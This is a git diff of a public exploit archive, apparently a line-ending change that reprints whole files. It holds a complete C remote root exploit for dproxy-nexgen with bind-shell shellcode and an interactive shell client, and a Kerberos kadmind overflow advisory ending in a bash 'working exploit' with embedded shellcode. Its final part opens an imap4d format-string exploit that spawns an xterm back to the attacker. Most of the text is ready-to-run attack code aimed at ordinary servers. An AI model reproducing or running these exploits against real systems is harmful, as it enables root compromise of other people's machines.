- * dproxy-nexgen remote root exploit (x86-lnx)
- * by mu-b - Mar 2007
- *
- * - Tested on: dproxy-nexgen (.tar.gz)
- *
- * This program is free software; you can redistribute it and/or modify
- * it under the terms of the GNU General Public License as published by
- * the Free Software Foundation; version 2 of the License.
- *
- * This program is distributed in the hope that it will be useful,
- * but WITHOUT ANY WARRANTY; without even the implied warranty of
- * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
- * GNU General Public License for more details.
- *
- * http://www.digit-labs.org/ -- Digit-Labs 2007!@$!
- */
-
-#include
-#include
-#include
-#include
-#include
-#include
-
-#define BUF_SIZE 512
-#define NOP 0x41
-
-#define DEF_PORT 53
-#define PORT_DNS DEF_PORT
-#define PORT_SHELL 4444
-
-const u_char bndshell_lnx[] =
- "\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x99\x89\xe1\xcd\x80\x96"
- "\x43\x52\x66\x68\x11\x5c\x66\x53\x89\xe1\x6a\x66\x58\x50\x51\x56"
- "\x89\xe1\xcd\x80\xb0\x66\xd1\xe3\xcd\x80\x52\x52\x56\x43\x89\xe1"
- "\xb0\x66\xcd\x80\x93\x6a\x02\x59\xb0\x3f\xcd\x80\x49\x79\xf9\xb0"
- "\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53"
- "\x89\xe1\xcd\x80";
-
-#define NUM_TARGETS 2
-
-struct target_t
-{
- const u_char *name;
- const int len;
- const int zshell_pos;
- const u_char *zshell;
- const int fp_pos;
- const u_long fp;
-};
-
-/* fp = objdump -D dproxy | grep "ff e2" */
-struct target_t targets[] = {
- {"dproxy-nexgen (tar.gz)",
- 512, 25, bndshell_lnx, 284, 0x08048cf9}
- ,
- {"dproxy-nexgen (tar.gz, Debian stable)",
- 512, 25, bndshell_lnx, 281, 0x08048cf8}
- ,
- {0}
-};
-
-static int sock_send (int sock, u_char * src, int len);
-static int sock_recv (int sock, u_char * dst, int len);
-static void sock_send_udp (u_char * host, int port, u_char * src, int len);
-static int sockami (u_char * host, int port);
-static void shellami (int sock);
-static void zbuffami (u_char * zbuf, struct target_t *trgt);
-
-static int
-sock_send (int sock, u_char * src, int len)
-{
- int sbytes;
-
- sbytes = send (sock, src, len, 0);
-
- return (sbytes);
-}
-
-static int
-sock_recv (int sock, u_char * dst, int len)
-{
- int rbytes;
-
- rbytes = recv (sock, dst, len, 0);
- if (rbytes >= 0)
- dst[rbytes] = '\0';
-
- return (rbytes);
-}
-
-static void
-sock_send_udp (u_char * host, int port, u_char * src, int len)
-{
- struct sockaddr_in address;
- struct hostent *hp;
- int sock;
-
- fflush (stdout);
- if ((sock = socket (AF_INET, SOCK_DGRAM, 0)) == -1)
- {
- perror ("socket()");
- exit (-1);
- }
-
- if ((hp = gethostbyname (host)) == NULL)
- {
- perror ("gethostbyname()");
- exit (-1);
- }
-
- memset (&address, 0, sizeof (address));
- memcpy ((char *) &address.sin_addr, hp->h_addr, hp->h_length);
- address.sin_family = AF_INET;
- address.sin_port = htons (port);
-
- sendto (sock, src, len, 0, (struct sockaddr *) &address, sizeof (address));
-}
-
-static int
-sockami (u_char * host, int port)
-{
- struct sockaddr_in address;
- struct hostent *hp;
- int sock;
-
- fflush (stdout);
- if ((sock = socket (AF_INET, SOCK_STREAM, 0)) == -1)
- {
- perror ("socket()");
- exit (-1);
- }
-
- if ((hp = gethostbyname (host)) == NULL)
- {
- perror ("gethostbyname()");
- exit (-1);
- }
-
- memset (&address, 0, sizeof (address));
- memcpy ((char *) &address.sin_addr, hp->h_addr, hp->h_length);
- address.sin_family = AF_INET;
- address.sin_port = htons (port);
-
- if (connect (sock, (struct sockaddr *) &address, sizeof (address)) == -1)
- {
- perror ("connect()");
- exit (EXIT_FAILURE);
- }
-
- return (sock);
-}
-
-static void
-shellami (int sock)
-{
- int n;
- fd_set rset;
- u_char recvbuf[1024], *cmd = "id; uname -a; uptime\n";
-
- sock_send (sock, cmd, strlen (cmd));
-
- while (1)
- {
- FD_ZERO (&rset);
- FD_SET (sock, &rset);
- FD_SET (STDIN_FILENO, &rset);
- select (sock + 1, &rset, NULL, NULL, NULL);
- if (FD_ISSET (sock, &rset))
- {
- if ((n = sock_recv (sock, recvbuf, sizeof (recvbuf) - 1)) <= 0)
- {
- fprintf (stderr, "Connection closed by foreign host.\n");
- exit (EXIT_SUCCESS);
- }
- printf ("%s", recvbuf);
- }
- if (FD_ISSET (STDIN_FILENO, &rset))
- {
- if ((n = read (STDIN_FILENO, recvbuf, sizeof (recvbuf) - 1)) > 0)
- {
- recvbuf[n] = '\0';
- sock_send (sock, recvbuf, n);
- }
- }
- }
-}
-
-static void
-zbuffami (u_char * zbuf, struct target_t *trgt)
-{
- int i;
- u_char *ptr;
-
- ptr = zbuf;
- memset (ptr, NOP, trgt->len);
-
- *ptr++ = 0x69; /* transaction id */
- *ptr++ = 0x69;
- *ptr++ = 0x81; /* flags */
- *ptr++ = 0x80;
- *ptr++ = 0x00; /* number of questions */
- *ptr++ = 0x00;
- *ptr++ = 0x00; /* number of answers */
- *ptr++ = 0x01;
- *ptr++ = 0x00; /* number of authority rr's */
- *ptr++ = 0x00;
- *ptr++ = 0x00; /* number of additional rr's */
- *ptr++ = 0x00;
-
- *ptr++ = 0xc0; /* compressed name &ptr+18 */
- *ptr++ = 0x18;
- *ptr++ = 0x00; /* type = PTR */
- *ptr++ = 0x0c;
- *ptr++ = 0x07; /* class = jmp short +0x07 */
- *ptr++ = 0xeb;
-
- *ptr++ = 0xff; /* ttl */
- *ptr++ = 0xff;
- *ptr++ = 0xff;
- *ptr++ = 0xff;
-
- *ptr++ = 0x01; /* data length = 488 bytes */
- *ptr++ = 0xe8;
-
- /* wire format name */
- for (i = 0; i < 2; i++, ptr += 0x7f) {
- *ptr++ = 0x7f;
- memset (ptr, NOP, 0x7f);
- }
-
- *ptr++ = 0x02; /* padding */
- *ptr++ = NOP;
- *ptr++ = NOP;
- *ptr++ = 0x00; /* terminate name */
-
- /* terminate buffer */
- ptr = zbuf + trgt->len - 1;
- *ptr-- = 0x2e;
- *ptr = 0x2e;
-
- memcpy (zbuf + trgt->zshell_pos, trgt->zshell, strlen (trgt->zshell));
-
- zbuf[trgt->fp_pos] = (u_char) (trgt->fp & 0x000000ff);
- zbuf[trgt->fp_pos + 1] = (u_char) ((trgt->fp & 0x0000ff00) >> 8);
- zbuf[trgt->fp_pos + 2] = (u_char) ((trgt->fp & 0x00ff0000) >> 16);
- zbuf[trgt->fp_pos + 3] = (u_char) ((trgt->fp & 0xff000000) >> 24);
-}
-
-int
-main (int argc, char **argv)
-{
- int sock;
- u_char zbuf[BUF_SIZE];
- struct target_t *trgt;
-
- printf ("dproxy-nexgen remote root exploit\n"
- "by: \n"
- "http://www.digit-labs.org/ -- Digit-Labs 2007!@$!\n\n");
-
- if (argc <= 2)
- {
- fprintf (stderr, "Usage: %s \n", argv[0]);
- exit (EXIT_SUCCESS);
- }
-
- if (atoi (argv[2]) >= NUM_TARGETS)
- {
- fprintf (stderr, "Only %d targets known!!\n", NUM_TARGETS);
- exit (EXIT_SUCCESS);
- }
-
- trgt = &targets[atoi (argv[2])];
- printf ("+Attacking to %s...\n", argv[1]);
-
- printf ("fp: 0x%x\n", (int) trgt->fp);
- printf ("buf len: %d\n", trgt->len);
-
- printf ("+Building buffer with shellcode...");
- memset (zbuf, 0x00, sizeof (zbuf));
- zbuffami (zbuf, trgt);
- printf (" done\n");
-
- printf ("+Sending Payload...");
- sock_send_udp (argv[1], PORT_DNS, zbuf, BUF_SIZE);
- printf (" done\n");
-
- printf ("+Waiting for the shellcode to be executed...\n");
- sleep (1);
- sock = sockami (argv[1], PORT_SHELL);
- printf ("+Wh00t!\n\n");
- shellami (sock);
-
- return (EXIT_SUCCESS);
-}
-
-// milw0rm.com [2007-03-30]
+/* dproxy-v1.c
+ *
+ * Copyright (c) 2007 by
+ *
+ * dproxy-nexgen remote root exploit (x86-lnx)
+ * by mu-b - Mar 2007
+ *
+ * - Tested on: dproxy-nexgen (.tar.gz)
+ *
+ * This program is free software; you can redistribute it and/or modify
+ * it under the terms of the GNU General Public License as published by
+ * the Free Software Foundation; version 2 of the License.
+ *
+ * This program is distributed in the hope that it will be useful,
+ * but WITHOUT ANY WARRANTY; without even the implied warranty of
+ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+ * GNU General Public License for more details.
+ *
+ * http://www.digit-labs.org/ -- Digit-Labs 2007!@$!
+ */
+
+#include
+#include
+#include
+#include
+#include
+#include
+
+#define BUF_SIZE 512
+#define NOP 0x41
+
+#define DEF_PORT 53
+#define PORT_DNS DEF_PORT
+#define PORT_SHELL 4444
+
+const u_char bndshell_lnx[] =
+ "\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x99\x89\xe1\xcd\x80\x96"
+ "\x43\x52\x66\x68\x11\x5c\x66\x53\x89\xe1\x6a\x66\x58\x50\x51\x56"
+ "\x89\xe1\xcd\x80\xb0\x66\xd1\xe3\xcd\x80\x52\x52\x56\x43\x89\xe1"
+ "\xb0\x66\xcd\x80\x93\x6a\x02\x59\xb0\x3f\xcd\x80\x49\x79\xf9\xb0"
+ "\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53"
+ "\x89\xe1\xcd\x80";
+
+#define NUM_TARGETS 2
+
+struct target_t
+{
+ const u_char *name;
+ const int len;
+ const int zshell_pos;
+ const u_char *zshell;
+ const int fp_pos;
+ const u_long fp;
+};
+
+/* fp = objdump -D dproxy | grep "ff e2" */
+struct target_t targets[] = {
+ {"dproxy-nexgen (tar.gz)",
+ 512, 25, bndshell_lnx, 284, 0x08048cf9}
+ ,
+ {"dproxy-nexgen (tar.gz, Debian stable)",
+ 512, 25, bndshell_lnx, 281, 0x08048cf8}
+ ,
+ {0}
+};
+
+static int sock_send (int sock, u_char * src, int len);
+static int sock_recv (int sock, u_char * dst, int len);
+static void sock_send_udp (u_char * host, int port, u_char * src, int len);
+static int sockami (u_char * host, int port);
+static void shellami (int sock);
+static void zbuffami (u_char * zbuf, struct target_t *trgt);
+
+static int
+sock_send (int sock, u_char * src, int len)
+{
+ int sbytes;
+
+ sbytes = send (sock, src, len, 0);
+
+ return (sbytes);
+}
+
+static int
+sock_recv (int sock, u_char * dst, int len)
+{
+ int rbytes;
+
+ rbytes = recv (sock, dst, len, 0);
+ if (rbytes >= 0)
+ dst[rbytes] = '\0';
+
+ return (rbytes);
+}
+
+static void
+sock_send_udp (u_char * host, int port, u_char * src, int len)
+{
+ struct sockaddr_in address;
+ struct hostent *hp;
+ int sock;
+
+ fflush (stdout);
+ if ((sock = socket (AF_INET, SOCK_DGRAM, 0)) == -1)
+ {
+ perror ("socket()");
+ exit (-1);
+ }
+
+ if ((hp = gethostbyname (host)) == NULL)
+ {
+ perror ("gethostbyname()");
+ exit (-1);
+ }
+
+ memset (&address, 0, sizeof (address));
+ memcpy ((char *) &address.sin_addr, hp->h_addr, hp->h_length);
+ address.sin_family = AF_INET;
+ address.sin_port = htons (port);
+
+ sendto (sock, src, len, 0, (struct sockaddr *) &address, sizeof (address));
+}
+
+static int
+sockami (u_char * host, int port)
+{
+ struct sockaddr_in address;
+ struct hostent *hp;
+ int sock;
+
+ fflush (stdout);
+ if ((sock = socket (AF_INET, SOCK_STREAM, 0)) == -1)
+ {
+ perror ("socket()");
+ exit (-1);
+ }
+
+ if ((hp = gethostbyname (host)) == NULL)
+ {
+ perror ("gethostbyname()");
+ exit (-1);
+ }
+
+ memset (&address, 0, sizeof (address));
+ memcpy ((char *) &address.sin_addr, hp->h_addr, hp->h_length);
+ address.sin_family = AF_INET;
+ address.sin_port = htons (port);
+
+ if (connect (sock, (struct sockaddr *) &address, sizeof (address)) == -1)
+ {
+ perror ("connect()");
+ exit (EXIT_FAILURE);
+ }
+
+ return (sock);
+}
+
+static void
+shellami (int sock)
+{
+ int n;
+ fd_set rset;
+ u_char recvbuf[1024], *cmd = "id; uname -a; uptime\n";
+
+ sock_send (sock, cmd, strlen (cmd));
+
+ while (1)
+ {
+ FD_ZERO (&rset);
+ FD_SET (sock, &rset);
+ FD_SET (STDIN_FILENO, &rset);
+ select (sock + 1, &rset, NULL, NULL, NULL);
+ if (FD_ISSET (sock, &rset))
+ {
+ if ((n = sock_recv (sock, recvbuf, sizeof (recvbuf) - 1)) <= 0)
+ {
+ fprintf (stderr, "Connection closed by foreign host.\n");
+ exit (EXIT_SUCCESS);
+ }
+ printf ("%s", recvbuf);
+ }
+ if (FD_ISSET (STDIN_FILENO, &rset))
+ {
+ if ((n = read (STDIN_FILENO, recvbuf, sizeof (recvbuf) - 1)) > 0)
+ {
+ recvbuf[n] = '\0';
+ sock_send (sock, recvbuf, n);
+ }
+ }
+ }
+}
+
+static void
+zbuffami (u_char * zbuf, struct target_t *trgt)
+{
+ int i;
+ u_char *ptr;
+
+ ptr = zbuf;
+ memset (ptr, NOP, trgt->len);
+
+ *ptr++ = 0x69; /* transaction id */
+ *ptr++ = 0x69;
+ *ptr++ = 0x81; /* flags */
+ *ptr++ = 0x80;
+ *ptr++ = 0x00; /* number of questions */
+ *ptr++ = 0x00;
+ *ptr++ = 0x00; /* number of answers */
+ *ptr++ = 0x01;
+ *ptr++ = 0x00; /* number of authority rr's */
+ *ptr++ = 0x00;
+ *ptr++ = 0x00; /* number of additional rr's */
+ *ptr++ = 0x00;
+
+ *ptr++ = 0xc0; /* compressed name &ptr+18 */
+ *ptr++ = 0x18;
+ *ptr++ = 0x00; /* type = PTR */
+ *ptr++ = 0x0c;
+ *ptr++ = 0x07; /* class = jmp short +0x07 */
+ *ptr++ = 0xeb;
+
+ *ptr++ = 0xff; /* ttl */
+ *ptr++ = 0xff;
+ *ptr++ = 0xff;
+ *ptr++ = 0xff;
+
+ *ptr++ = 0x01; /* data length = 488 bytes */
+ *ptr++ = 0xe8;
+
+ /* wire format name */
+ for (i = 0; i < 2; i++, ptr += 0x7f) {
+ *ptr++ = 0x7f;
+ memset (ptr, NOP, 0x7f);
+ }
+
+ *ptr++ = 0x02; /* padding */
+ *ptr++ = NOP;
+ *ptr++ = NOP;
+ *ptr++ = 0x00; /* terminate name */
+
+ /* terminate buffer */
+ ptr = zbuf + trgt->len - 1;
+ *ptr-- = 0x2e;
+ *ptr = 0x2e;
+
+ memcpy (zbuf + trgt->zshell_pos, trgt->zshell, strlen (trgt->zshell));
+
+ zbuf[trgt->fp_pos] = (u_char) (trgt->fp & 0x000000ff);
+ zbuf[trgt->fp_pos + 1] = (u_char) ((trgt->fp & 0x0000ff00) >> 8);
+ zbuf[trgt->fp_pos + 2] = (u_char) ((trgt->fp & 0x00ff0000) >> 16);
+ zbuf[trgt->fp_pos + 3] = (u_char) ((trgt->fp & 0xff000000) >> 24);
+}
+
+int
+main (int argc, char **argv)
+{
+ int sock;
+ u_char zbuf[BUF_SIZE];
+ struct target_t *trgt;
+
+ printf ("dproxy-nexgen remote root exploit\n"
+ "by: \n"
+ "http://www.digit-labs.org/ -- Digit-Labs 2007!@$!\n\n");
+
+ if (argc <= 2)
+ {
+ fprintf (stderr, "Usage: %s \n", argv[0]);
+ exit (EXIT_SUCCESS);
+ }
+
+ if (atoi (argv[2]) >= NUM_TARGETS)
+ {
+ fprintf (stderr, "Only %d targets known!!\n", NUM_TARGETS);
+ exit (EXIT_SUCCESS);
+ }
+
+ trgt = &targets[atoi (argv[2])];
+ printf ("+Attacking to %s...\n", argv[1]);
+
+ printf ("fp: 0x%x\n", (int) trgt->fp);
+ printf ("buf len: %d\n", trgt->len);
+
+ printf ("+Building buffer with shellcode...");
+ memset (zbuf, 0x00, sizeof (zbuf));
+ zbuffami (zbuf, trgt);
+ printf (" done\n");
+
+ printf ("+Sending Payload...");
+ sock_send_udp (argv[1], PORT_DNS, zbuf, BUF_SIZE);
+ printf (" done\n");
+
+ printf ("+Waiting for the shellcode to be executed...\n");
+ sleep (1);
+ sock = sockami (argv[1], PORT_SHELL);
+ printf ("+Wh00t!\n\n");
+ shellami (sock);
+
+ return (EXIT_SUCCESS);
+}
+
+// milw0rm.com [2007-03-30]
diff --git a/platforms/linux/remote/3698.txt b/platforms/linux/remote/3698.txt
index e81b13925..cbd8b4f2c 100755
--- a/platforms/linux/remote/3698.txt
+++ b/platforms/linux/remote/3698.txt
@@ -1,145 +1,145 @@
-Kerberos Version 1.5.1 Kadmind Remote Root Buffer Overflow Vulnerability
-
-
-The Issue:
-Remotely exploitable buffer overflow vulnerability in Kerberos kadmind service
-
-The Versions:
-krb5-1.5.1 (Latest version from http://eb.mit.edu/Kerberos/ )
-krb5-server-1.4.3-5.1 (Latest version from Fedora yum update)
-
-The Environment:
-Linux Fedora Core 5 x86_64 bit
-
-The Overview:
-
-There is a remotly exploitable overflow bug in Kerberos kadmind service that can be triggered during the administration
-of principals via kadmin or kadmin.local and either in a local context or a remote context, which will allow the attacker
-the possibility of having Kerberos server yield the permissions of the user that it is running a, usually root. It can
-also be used as a denail of service against kadmind.
-
-root 1834 1 0 22:29 ? 00:00:00 /usr/kerberos/sbin/krb5kdc
-root 6600 1 0 23:00 ? 00:00:00 /usr/kerberos/sbin/kadmind
-
-To trigger the exploit, a valid user account has to first of all authenticate to the Kerberos service and have a ticket
-generated, the user therefor must be or have access to an admin account that can access thre remote kadmind
-service, which limits the scope of the attack slightly. However, this still allows anyone with the most limited access
-to the service to kill it or gain root access and as such should be treated as critical.
-
-A trivial issue encountered was that the kadmin client would filter out crazy strings passed to it, so you can't use it
-by default to send in shellcode and return addresses. To get around that we modify the client source code a bit to
-honour our malicious values and then upload it to our user directory, and as if by magic it will no longer bail when it
-encounters these strings ;)
-
-
-Following is the vulnerable function with the unused code, ifdefs and comments removed to make it easier to read
-
-/* krb5-1.5.1/src/lib/kadm5/logger.c
-
-static int
-klog_vsyslog(int priority, const char *format, va_list arglist)
-{
-char outbuf[KRB5_KLOG_MAX_ERRMSG_SIZE];
-char *syslogp;
-
-strncpy(outbuf, ctime(&now) + 4, 15);
-cp += 15;
-
-syslogp = &outbuf[strlen(outbuf)];
-
-vsprintf(syslogp, format, arglist);
-
-*/
-
-
-By exersizing any of the option presented to us in kadmin, we should be able to trigger this little bug, including:
-
-add_principal
-delete_principal
-modify_principal
-change_password
-get_principal
-... and on.....
-
-Another nice feature to kadmin is that it is possible to run it from the command line, and as such this makes crafting
-a payload much easier :) by running the following script, it should be possible to trigger this bug and kill kadmind:
-
-##########
-
-#!/bin/bash
-ADDIT="get_principal"
-ATTACK="cr4yz33_h4xx0r"
-KADMIN="/usr/kerberos/sbin/kadmin"
-KADMINDP="`netstat -anp --ip | grep kadmin | grep LISTEN | awk '{print $4}'| sed -e s/0.0.0.0://`"
-PRINCIPAL="root/admin@OPEN-SECURITY.ORG"
-TARGET=coredump.open-security.org
-TRIGGAH="`perl -e 'print "A" x 5000'`"
-
-$KADMIN -s $TARGET:$KADMINDP -p $PRINCIPAL -q "$ADDIT -pw $ATTACK $TRIGGAH"
-
-##########
-
-
-After running this script with various sized buffer values, we get faults in the following locations:
-
-// With 2000 A's //
-#0 0x0000003a2ed427d5 in vfprintf () from /lib64/libc.so.6
-#1 0x0000003a2ed5fc79 in vsprintf () from /lib64/libc.so.6
-#2 0x00002aaaaaabb2ea in klog_vsyslog (priority=5,
-format=0x40c4e0 "Request: %s, %s, %s, client=%s, service=%s, addr=%s", arglist=0x7ffffdb40e60)
-at logger.c:854
-#3 0x4141414141414141 in ?? ()
-#4 0x4141414141414141 in ?? ()
-#5 0x4141414141414141 in ?? ()
-....
-
-
-// With 5000 A's (On the Fedora version) //
-#0 0x00002aaaab65fc90 in strlen () from /lib64/libc.so.6
-#1 0x00002aaaab63088b in vfprintf () from /lib64/libc.so.6
-#2 0x00002aaaab6ca8ad in __vsprintf_chk () from /lib64/libc.so.6
-#3 0x00002aaaaabd2283 in krb5_klog_syslog () from /usr/lib64/libkadm5srv.so.5
-#4 0x4141414141414141 in ?? ()
-#5 0x4141414141414141 in ?? ()
-....
-
-
-// With 30000 a's //
-#0 0x0000003a2ed750ae in mempcpy () from /lib64/libc.so.6
-#1 0x0000003a2ed69a5b in _IO_default_xsputn_internal () from /lib64/libc.so.6
-#2 0x0000003a2ed44294 in vfprintf () from /lib64/libc.so.6
-#3 0x0000003a2ed5fc79 in vsprintf () from /lib64/libc.so.6
-#4 0x00002aaaaaabb2ea in klog_vsyslog (priority=5,
-format=0x40c4e0 "Request: %s, %s, %s, client=%s, service=%s, addr=%s", arglist=0x7fffbe94f220)
-at logger.c:854
-#5 0x6161616161616161 in ?? ()
-....
-
-
-
-In our vulnerable code we have the function klog_vsyslog, which is a lame attempt to create a custom logger, as we can
-see by the result of this advisory.
-
-
-Here is the working exploit:
-
-#!/bin/bash
-ADDIT="get_principal"
-ATTACK="cr4yz33_h4xx0r"
-KADMIN="kadmin"
-KADMINDP="`netstat -anp --ip | grep kadmin | grep LISTEN | awk '{print
-$4}'| sed -e s/0.0.0.0://`"
-PRINCIPAL="root/admin@OPEN-SECURITY.ORG"
-TARGET=debauch.open-security.org
-TRIGGAH="`perl -e 'print "A" x 900'`PAD`perl -e 'printf "\xc0\xfa\xff\xbf\x88\xf8\xff\xbf" x 20'``perl -e 'print
-"C" x 6'``perl -e 'print "\x90" x 50'`
-`echo -e "\xb0\x0b\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80"`"
-
-$KADMIN -s $TARGET:$KADMINDP -p $PRINCIPAL -q "$ADDIT $TRIGGAH"
-
-###end
-
-Reference:
-http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=500
-
-# milw0rm.com [2007-04-10]
+Kerberos Version 1.5.1 Kadmind Remote Root Buffer Overflow Vulnerability
+
+
+The Issue:
+Remotely exploitable buffer overflow vulnerability in Kerberos kadmind service
+
+The Versions:
+krb5-1.5.1 (Latest version from http://eb.mit.edu/Kerberos/ )
+krb5-server-1.4.3-5.1 (Latest version from Fedora yum update)
+
+The Environment:
+Linux Fedora Core 5 x86_64 bit
+
+The Overview:
+
+There is a remotly exploitable overflow bug in Kerberos kadmind service that can be triggered during the administration
+of principals via kadmin or kadmin.local and either in a local context or a remote context, which will allow the attacker
+the possibility of having Kerberos server yield the permissions of the user that it is running a, usually root. It can
+also be used as a denail of service against kadmind.
+
+root 1834 1 0 22:29 ? 00:00:00 /usr/kerberos/sbin/krb5kdc
+root 6600 1 0 23:00 ? 00:00:00 /usr/kerberos/sbin/kadmind
+
+To trigger the exploit, a valid user account has to first of all authenticate to the Kerberos service and have a ticket
+generated, the user therefor must be or have access to an admin account that can access thre remote kadmind
+service, which limits the scope of the attack slightly. However, this still allows anyone with the most limited access
+to the service to kill it or gain root access and as such should be treated as critical.
+
+A trivial issue encountered was that the kadmin client would filter out crazy strings passed to it, so you can't use it
+by default to send in shellcode and return addresses. To get around that we modify the client source code a bit to
+honour our malicious values and then upload it to our user directory, and as if by magic it will no longer bail when it
+encounters these strings ;)
+
+
+Following is the vulnerable function with the unused code, ifdefs and comments removed to make it easier to read
+
+/* krb5-1.5.1/src/lib/kadm5/logger.c
+
+static int
+klog_vsyslog(int priority, const char *format, va_list arglist)
+{
+char outbuf[KRB5_KLOG_MAX_ERRMSG_SIZE];
+char *syslogp;
+
+strncpy(outbuf, ctime(&now) + 4, 15);
+cp += 15;
+
+syslogp = &outbuf[strlen(outbuf)];
+
+vsprintf(syslogp, format, arglist);
+
+*/
+
+
+By exersizing any of the option presented to us in kadmin, we should be able to trigger this little bug, including:
+
+add_principal
+delete_principal
+modify_principal
+change_password
+get_principal
+... and on.....
+
+Another nice feature to kadmin is that it is possible to run it from the command line, and as such this makes crafting
+a payload much easier :) by running the following script, it should be possible to trigger this bug and kill kadmind:
+
+##########
+
+#!/bin/bash
+ADDIT="get_principal"
+ATTACK="cr4yz33_h4xx0r"
+KADMIN="/usr/kerberos/sbin/kadmin"
+KADMINDP="`netstat -anp --ip | grep kadmin | grep LISTEN | awk '{print $4}'| sed -e s/0.0.0.0://`"
+PRINCIPAL="root/admin@OPEN-SECURITY.ORG"
+TARGET=coredump.open-security.org
+TRIGGAH="`perl -e 'print "A" x 5000'`"
+
+$KADMIN -s $TARGET:$KADMINDP -p $PRINCIPAL -q "$ADDIT -pw $ATTACK $TRIGGAH"
+
+##########
+
+
+After running this script with various sized buffer values, we get faults in the following locations:
+
+// With 2000 A's //
+#0 0x0000003a2ed427d5 in vfprintf () from /lib64/libc.so.6
+#1 0x0000003a2ed5fc79 in vsprintf () from /lib64/libc.so.6
+#2 0x00002aaaaaabb2ea in klog_vsyslog (priority=5,
+format=0x40c4e0 "Request: %s, %s, %s, client=%s, service=%s, addr=%s", arglist=0x7ffffdb40e60)
+at logger.c:854
+#3 0x4141414141414141 in ?? ()
+#4 0x4141414141414141 in ?? ()
+#5 0x4141414141414141 in ?? ()
+....
+
+
+// With 5000 A's (On the Fedora version) //
+#0 0x00002aaaab65fc90 in strlen () from /lib64/libc.so.6
+#1 0x00002aaaab63088b in vfprintf () from /lib64/libc.so.6
+#2 0x00002aaaab6ca8ad in __vsprintf_chk () from /lib64/libc.so.6
+#3 0x00002aaaaabd2283 in krb5_klog_syslog () from /usr/lib64/libkadm5srv.so.5
+#4 0x4141414141414141 in ?? ()
+#5 0x4141414141414141 in ?? ()
+....
+
+
+// With 30000 a's //
+#0 0x0000003a2ed750ae in mempcpy () from /lib64/libc.so.6
+#1 0x0000003a2ed69a5b in _IO_default_xsputn_internal () from /lib64/libc.so.6
+#2 0x0000003a2ed44294 in vfprintf () from /lib64/libc.so.6
+#3 0x0000003a2ed5fc79 in vsprintf () from /lib64/libc.so.6
+#4 0x00002aaaaaabb2ea in klog_vsyslog (priority=5,
+format=0x40c4e0 "Request: %s, %s, %s, client=%s, service=%s, addr=%s", arglist=0x7fffbe94f220)
+at logger.c:854
+#5 0x6161616161616161 in ?? ()
+....
+
+
+
+In our vulnerable code we have the function klog_vsyslog, which is a lame attempt to create a custom logger, as we can
+see by the result of this advisory.
+
+
+Here is the working exploit:
+
+#!/bin/bash
+ADDIT="get_principal"
+ATTACK="cr4yz33_h4xx0r"
+KADMIN="kadmin"
+KADMINDP="`netstat -anp --ip | grep kadmin | grep LISTEN | awk '{print
+$4}'| sed -e s/0.0.0.0://`"
+PRINCIPAL="root/admin@OPEN-SECURITY.ORG"
+TARGET=debauch.open-security.org
+TRIGGAH="`perl -e 'print "A" x 900'`PAD`perl -e 'printf "\xc0\xfa\xff\xbf\x88\xf8\xff\xbf" x 20'``perl -e 'print
+"C" x 6'``perl -e 'print "\x90" x 50'`
+`echo -e "\xb0\x0b\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80"`"
+
+$KADMIN -s $TARGET:$KADMINDP -p $PRINCIPAL -q "$ADDIT $TRIGGAH"
+
+###end
+
+Reference:
+http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=500
+
+# milw0rm.com [2007-04-10]
diff --git a/platforms/linux/remote/372.c b/platforms/linux/remote/372.c
index 6176f6b74..b09ed0011 100755
--- a/platforms/linux/remote/372.c
+++ b/platforms/linux/remote/372.c
@@ -290,6 +290,6 @@ close(s);
 }
 return retval;
-}
-
-// milw0rm.com [2004-08-03]
+}
+
+// milw0rm.com [2004-08-03]
diff --git a/platforms/linux/remote/373.c b/platforms/linux/remote/373.c
index 6abf34653..0a6abc068 100755
--- a/platforms/linux/remote/373.c
+++ b/platforms/linux/remote/373.c
@@ -304,6 +304,6 @@ int main(int argc, char **argv) shell(args.host, SHELL_PORT); return 0; -} - -// milw0rm.com [2004-08-04] +} + +// milw0rm.com [2004-08-04] diff --git a/platforms/linux/remote/3787.c b/platforms/linux/remote/3787.c index 5f41f8c15..f61209e72 100755 --- a/platforms/linux/remote/3787.c +++ b/platforms/linux/remote/3787.c 
@@ -1,366 +1,366 @@ -/* -** -** Fedora Core 6 (exec-shield) based -** GNU imap4d mailutils-0.6 search remote format string exploit -** by Xpl017Elz -** -** Advanced exploitation in exec-shield (Fedora Core case study) -** URL: http://x82.inetcop.org/h0me/papers/FC_exploit/FC_exploit.txt -** -** Reference: http://www.securityfocus.com/bid/14794 (2005/09/09) -** http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=303 -** -** -- -** exploit by "you dong-hun"(Xpl017Elz), . -** My World: http://x82.inetcop.org -** -*/ -/* -** -=-= POINT! POINT! POINT! POINT! POINT! =-=- -** -** This vulnerability is one of the normal exploitation case under exec-shield. -** GNU imap4d can be run as a standalone deamon by using -d option and it inherits -** virtual address of parent process which mapped randomly. -** -** [root@localhost .libs]# ps -ef | grep imap4d | grep -v grep -** root 8312 1 0 20:01 ? 00:00:00 ./lt-imap4d -d -** [root@localhost .libs]# -** -** These are keys to get over some possible problems. -** -** * `One shot' exploit without brute-forcing. -** -** Sometimes you man need to do some brute-forcing to assume the library address -** which is mapped randomly. But this is not my recommendation. -** -** Because it is a format string attack, we can possibly get the ramdom address -** of the library. Using this technique, I could find exploitable do_system() -** address at once. but, unfortunately, it is not applicable to blind format string -** exploit by syslog(). -** -** * How to execute a remote shell. -** -** I decided to use xterm for this, but if sadly, there is no xterm on the target -** server then you should look for another way. because of the variableness -** of size of IP address, I felt a need for fitting the address within 10 bytes. -** -** Hacker's IP address would be a perfect demical numbers and it makes size -** of IP address same and shortens the string to overwrite. 
